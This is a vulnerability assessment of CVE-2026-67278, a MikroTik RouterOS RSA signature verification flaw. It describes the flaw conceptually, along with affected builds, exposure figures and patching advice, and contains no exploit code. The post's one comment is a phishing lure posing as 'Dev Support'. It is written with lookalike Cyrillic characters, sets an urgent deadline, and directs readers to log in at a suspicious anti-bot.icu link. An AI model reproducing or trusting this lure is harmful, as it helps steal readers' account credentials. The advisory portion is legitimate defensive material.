Assessing CVE-2026-67278 Risk: Why Trust Failures Outrank Their CVSS Label
Vulnerability overview
CVE-2026-67278 is a MikroTik RouterOS 7.x RSA/PKCS#1 v1.5 verification flaw that CERT Polska published on 5 September 2026. RouterOS accepts malformed signatures across TLS/X.509 certificate validation and RSA SSH host-key authentication. RouterOS 7.23.6 (long-term) and 7.24.3 (stable) carry the complete fix.
Mechanism and exploitation conditions
The device trust store contains a root CA certificate with public exponent e=3. An attacker who controls or redirects an outbound TLS connection can use that public certificate, without the private key, to forge a trusted intermediate and mint certificates for arbitrary host names. RSA-based SSH authentication shares the same permissive check. A network position and an unpatched build are both required, and no confirmed exploitation of this CVE has been published.
Impact
Trust failures are awkward to score because nothing crashes. The practical effects are server impersonation on outbound connections and weakened RSA SSH host-key assurance. For an environment where routers reach update, telemetry or management endpoints on their own initiative, that is a durable weakening of the identity model the rest of the control set assumes.
Affected products and scope
RouterOS 7.x only: from 7.0.0 before 7.23.6, and from 7.24 before 7.24.3. Fixed in 7.23.6 and 7.24.3. The 7.23.4 and 7.24.2 builds contained an incomplete fix, and the 6.x branch is outside the published range.
Exposure context
ZoomEye reported 9,559 assets for os="RouterOS" && service="ssh" on 23 September 2026, while vul.cve="CVE-2026-67278" returned 0. The product figure counts RouterOS SSH fingerprints rather than confirmed vulnerable devices, and the zero CVE figure does not establish absence. Search link: https://www.zoomeye.ai/searchResult?q=b3M9IlJvdXRlck9TIiAmJiBzZXJ2aWNlPSJzc2gi
Remediation and mitigations
- Upgrade to 7.23.6 or 7.24.3, then confirm the exact build string per device.
- Prioritise devices that make outbound TLS connections to systems you depend on.
- Where an upgrade must wait, restrict reachability and record the accepted risk explicitly.
- Re-examine automation that trusts device identity, since that assumption has been weakened.
- Keep 7.23.4 and 7.24.2 out of any "remediated" inventory.
References
- CERT Polska advisory on MikroTik RouterOS vulnerabilities: https://cert.pl/posts/2026/09/mikrotik-routeros-cve/
- CERT Polska technical analysis of the RouterOS disclosure process: https://cert.pl/posts/2026/09/mikrotick-analiza-techniczna/
Top comments (1)
Dear User,
Due to аn increasе in bot actіvity оn thе platform, wе require verify оf уоur account.
Рleаsе log іn viа the lіnk below:
• anti-bot.icu/5K0N5G7M9C4
Verificated deаdline - 12 hours.
Sincerely,Dev Supрort